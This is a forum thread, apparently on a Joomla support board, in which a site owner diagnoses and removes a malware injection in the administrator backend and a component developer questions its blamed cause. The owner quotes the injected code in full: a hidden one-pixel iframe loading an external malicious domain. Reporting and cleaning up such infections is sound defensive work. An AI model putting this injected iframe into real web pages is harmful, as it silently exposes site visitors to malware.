virus / php injection internetcountercheck.com in backend!

[delhidjinn]

on loading http://uniqueindiatour.com/administrato ... _installer I get the chrome message of this malware.

On the front end it is not visible.

I have changed the ftp password.

This is since yesterday. I had installed Ninja RSS component, which later I found after this event that Joomla advises against using it.

I have removed Ninja Rss but the problem persists.

I checked my site on http://www.unmaskparasites.com/ which says nothing is wrong. But it can check the frontend only.

When I do view-source:http://uniqueindiatour.com/administrato ... _installer in the code i find this:

<input type="hidden" name="9ba575d9c85a065355e4c05c0a564be3" value="1" /></form><iframe src="http://internetcountercheck.com/?click=13177296" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<div class="clr"></div>

It is only when I want to install something that this maliciousness is visible.

I checked the php code of com_installer but could not find any reference to it.

Will I be able to remove it easily?

I have in the meantime advised my hosting provider to do a virus scan as well.

Thanks in advance.

[delhidjinn]

I have solved this. The help was from here http://www.msamir.net/joomla-and-wordpress-virus/

Basically downloaded full package of joomla 1.5.18, unzipped it on my machine, uploaded all the files to the webserver. After this, it gave me the message I need to delete the installation folder, which I did.
After this, in the first tests, all izz well

Hope I do not have to post again.

[delhidjinn]

Spoke to soon!
Few components were infected as well. Had to uninstall them and re-install. Seems to work for the moment.

[Danayel]

Hi delhidjinn,

How do you know it was Ninja RSS that cause it and not just a coincidence of timing?

This virus can only be planted with FTP access to your site which Ninja RSS doesn't have, enable or give.

It also seems odd that it happened the same day you installed Ninja RSS, but we haven't had any other reports of sites being infected with this virus via Ninja RSS.

Can you be certain it was Ninja RSS?

p.s. what do you mean Joomla advises against Ninja RSS?

[delhidjinn]

Now that we are discussing this:

It could be coincidence because just a day before I gave ftp access to my seo company, maybe it happened then.

I was certain of ninja rss because that was the only component I had installed in those days. But I gave ftp access as well, which I had immediately discontinued on discovering this injection and uninstalled ninja rss. Also, as the component figures on the Joomla's caution list, it was a case of 2 +2 - that's all.

Joomla advises against ninja rss: it was due to the list of components with known vulnerabilities which is the Joomla caution list.

[Danayel]

It should have been taken off the list as we removed the vulnerability 15 minutes after it was announced and we emailed them. It was some code left over from the previous developer which we hadn't noticed.

I will email them again. Thanks for letting me know.

Which SEO company do you use by the way?